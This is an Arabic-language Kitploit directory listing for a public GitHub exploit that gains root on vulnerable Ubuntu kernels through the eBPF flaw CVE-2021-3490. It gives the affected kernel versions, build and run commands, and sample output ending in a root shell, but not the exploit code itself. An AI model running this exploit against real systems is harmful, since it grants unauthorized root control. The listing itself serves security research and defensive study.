Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Linux_LPE_eBPF_CVE-2021-3490 — استغلال تصعيد الامتيازات المحلية لنواة Linux المعتمد على eBPF والذي يستهدف CVE-2021-3490. يوفر وصول شل الجذر على نوى Ubuntu الضعيفة من 5.8.0-25 إلى 5.11.0-16. | Kitploit
أدوات/GitHubGitHub/chompie1337/linux_lpe_ebpf_cve-2021-3490
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubchompie1337/linux_lpe_ebpf_cve-2021-3490

Linux_LPE_eBPF_CVE-2021-3490

استغلال تصعيد الامتيازات المحلية لنواة Linux المعتمد على eBPF والذي يستهدف CVE-2021-3490. يوفر وصول شل الجذر على نوى Ubuntu الضعيفة من 5.8.0-25 إلى 5.11.0-16.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
317484منذ 3 سنواتتمت المراجعة من قبل Kitploit

Linux_LPE_eBPF_CVE-2021-3490

استغلال LPE لـ CVE-2021-3490. تم اختباره على أنوية Ubuntu 20.04.02 و 20.10 (Groovy Gorilla) من الإصدار 5.8.0-25.26 حتى 5.8.0-52.58. و Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. تم اكتشاف الثغرة بواسطة Manfred Paul @_manfp وتم إصلاحها في هذا الالتزام.

المؤلف: @chompie1337

لأغراض تعليمية/بحثية فقط. استخدمه على مسؤوليتك الخاصة.

الاستخدام:

للبناء من أجل Ubuntu 20.04.02 و Ubuntu 20.10 (Groovy Gorilla):

make groovy

للبناء من أجل Ubuntu 21.04 (Hirsute Hippo):

make hirsute

للتشغيل:

bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

ملاحظة: يجب بالضرورة الخروج بشكل نظيف من الصلبة الجذر عن طريق كتابة exit لتنفيذ التنظيف وتجنب تعطل النواة.

اطلع على الشرح Kernel Pwning with eBPF: a Love Story.

تنزيل الأداة